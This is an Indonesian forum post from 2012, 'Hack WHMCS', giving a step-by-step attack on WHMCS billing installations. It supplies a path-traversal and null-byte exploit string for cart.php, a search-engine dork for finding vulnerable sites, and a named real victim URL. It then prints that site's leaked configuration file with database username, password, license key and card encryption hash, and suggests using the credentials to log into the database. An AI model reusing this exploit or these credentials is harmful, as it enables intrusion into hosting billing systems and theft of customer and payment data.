Page 1 of 1

Hack WHMCS

PostPosted: Sun Feb 26, 2012 8:18 pm
by djrhiby
:roll: salam kenal neh gan mungkin ini baru pertama kali saya share ya kali ini saya mau share tentang
Hack WHMCS ??? waduuhh emang nya gimana ya :lol: di dunia ini tidak ada security yang 100% menurut saya ya gan :geek: totur ini juga butuh kesabaran :roll: jadi jangan terlalu nafsu ya gan :lol: ok deh kita ke take point aja ya
semoga gak repost ini
Exploiti Powered by whmcs
/cart.php?a=
cart.php?a=test&templatefile=../../../configuration.php%00


untuk dork nya saya biasa memakai ini gan
inurl:whmcs/cart.php?a=

mungkin dork bisa dengan imajinasi kalian :lol:
untuk korban saya saya kasih deh buat pembelajaran saja
Code: Select all
https://www.600host.net/billing/cart.php


tambahkan aja belakang cart.php ganti dengan exploit ini
Code: Select all
cart.php?a=test&templatefile=../../../configuration.php%00

ntar hasil nya akan begini gan
Code: Select all
https://www.600host.net/billing/cart.php?a=test&templatefile=../../../configuration.php

kalau sudah enter tampilan akan kosong
contoh gambar
Image

nah kalau sudah kita tekan CTRL+U kita lihat di bagian ini
Image

code di bagian ini
Code: Select all
<?php
$license="c82f91de790f";
$db_host = "localhost";
$db_username = "host_whmcs";
$db_password = "}|jkxpHl-pU6";
$db_name = "host_whmcs";
$cc_encryption_hash = "gyD5g3OMqdMlszfhWiKAjzwxTQByVNu1bYWhRBT8FwkXVp5IyF9H5w4OcwdX9xPa";
$templates_compiledir = "templates_c/";
$display_errors=true;
?>


taraaa kita berhasil mendapatkan database :lol:
selanjut nya bisa kita menggunakan phpmyadmin / filezilla
semoga totur ini bermanfaat

[email protected]